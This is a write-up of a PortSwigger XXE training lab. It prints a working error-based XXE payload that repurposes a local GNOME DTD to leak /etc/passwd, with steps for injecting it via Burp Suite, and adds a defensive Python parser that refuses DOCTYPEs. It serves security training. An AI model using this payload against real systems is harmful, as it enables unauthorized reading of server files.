Exploiting XXE To Retrieve Data By Repurposing A Local DTD

Introduction

This is our 9th lab on XML external entity (XXE) injection. The lab is provided by PortSwigger Web Security and is named “Exploiting XXE to retrieve data by repurposing a local DTD.” In today’s article, we will solve it.

Lab Description Of Exploiting XXE to retrieve data by repurposing a local DTD


In this lab, we have a stock check feature that parses XML input but does not display the result. To solve the lab, we need to trigger an error message whose text includes the contents of the “/etc/passwd” file. To do that, you will need to reference a DTD file that already exists on the server.

Hint: The system is using the GNOME desktop environment, which provides its own DTD. Location: /usr/share/yelp/dtd/docbookx.dtd. There is an entity named ISOamso in it.

Lab Solution


To solve the lab, first, you need to access the lab. After accessing the lab, you will see various products. Click on any product to view its details.


Now, you will find a button labeled “Check stock.” Click on it and intercept the request in Burp Suite.

<!DOCTYPE message [
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
  <!ENTITY % ISOamso '
    <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;error;
  '>
  %local_dtd;
]>

After intercepting, send the POST request to Repeater. Copy the DOCTYPE shown above and place it between the XML declaration and the stock check element.

In the payload above, you can clearly see that we are attempting to read file:///etc/passwd from the server. Here, we are reusing GNOME’s local DTD: the local_dtd parameter entity loads /usr/share/yelp/dtd/docbookx.dtd, and because that DTD references the ISOamso entity, our redefinition of ISOamso is evaluated when it is loaded. That redefinition declares the file entity, builds the error entity with a path under /nonexistent/ that contains the file contents, and then references it, so the parser’s error message reveals /etc/passwd.
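From the defender’s side, the fix is to refuse any DOCTYPE in client-supplied XML before a single entity can be declared. The following is an added example, not part of the lab or of PortSwigger’s material: it uses Python’s built-in expat parser to parse a constructed stock-check body (the element names productId and storeId are assumed) and rejects the DOCTYPE prologue from this page’s payload.

```python
import xml.parsers.expat

# Constructed sample of the lab's stock-check body; the field names are assumed.
BENIGN_XML = ('<?xml version="1.0"?>'
              '<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>')

# The same body with the DOCTYPE prologue from this page's payload (abbreviated).
XXE_XML = ('<?xml version="1.0"?>'
           '<!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM '
           '"file:///usr/share/yelp/dtd/docbookx.dtd"> %local_dtd; ]>'
           '<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>')


class DoctypeRejected(ValueError):
    """Client XML carried a DOCTYPE, the vehicle for every XXE variant including this one."""


def parse_stock_check(xml_text: str) -> dict:
    """Parse untrusted XML, refusing any DTD and never expanding parameter entities.

    Returns {leaf element name: text} for an accepted document.
    """
    parser = xml.parsers.expat.ParserCreate()
    # Belt and braces: even if a DOCTYPE got through, %local_dtd; would not be fetched.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    fields: dict = {}
    open_elements: list = []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        # Fires before the internal subset is processed, so no entity is ever declared.
        raise DoctypeRejected(f"DOCTYPE {name!r} is not allowed in client input")

    def char_data(data):
        if open_elements and data.strip():
            fields[open_elements[-1]] = fields.get(open_elements[-1], "") + data.strip()

    parser.StartDoctypeDeclHandler = start_doctype
    parser.StartElementHandler = lambda name, attrs: open_elements.append(name)
    parser.EndElementHandler = lambda name: open_elements.pop()
    parser.CharacterDataHandler = char_data
    parser.Parse(xml_text, True)
    return fields


def accepts(xml_text: str) -> bool:
    """True if the document parses under the hardened policy, False if its DOCTYPE was refused."""
    try:
        parse_stock_check(xml_text)
        return True
    except DoctypeRejected:
        return False


if __name__ == "__main__":
    print("benign:", parse_stock_check(BENIGN_XML))  # {'productId': '1', 'storeId': '1'}
    print("payload accepted?", accepts(XXE_XML))      # False
```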

We have successfully solved the lab called Exploiting XXE to retrieve data by repurposing a local DTD.

Congratulations!

If you want to learn web security, you can find all web security-related articles on our website. We upload articles on web security on a daily basis, so stay with us.

What is web security?

Website security refers to protecting a website or web application from cyberattacks, unauthorized access, or other security threats.

What is web application security?

Web application security means protecting a website from cyberattacks. These attacks may include vulnerabilities such as SQL injection, XSS, file inclusion, and others.

Which of the following is a good security practice for web browsing?

It is always a good practice to use an up-to-date browser and apply updates promptly. Keep your browser plugins up to date, avoid malicious websites and links, enable two-factor authentication, and be wary of clickjacking.

How to find someone’s social security number on the dark web

Searching for someone’s social security number or credit card information on the dark web is illegal and unethical. It is important to always avoid such activities and protect yourself and others from cyber threats.
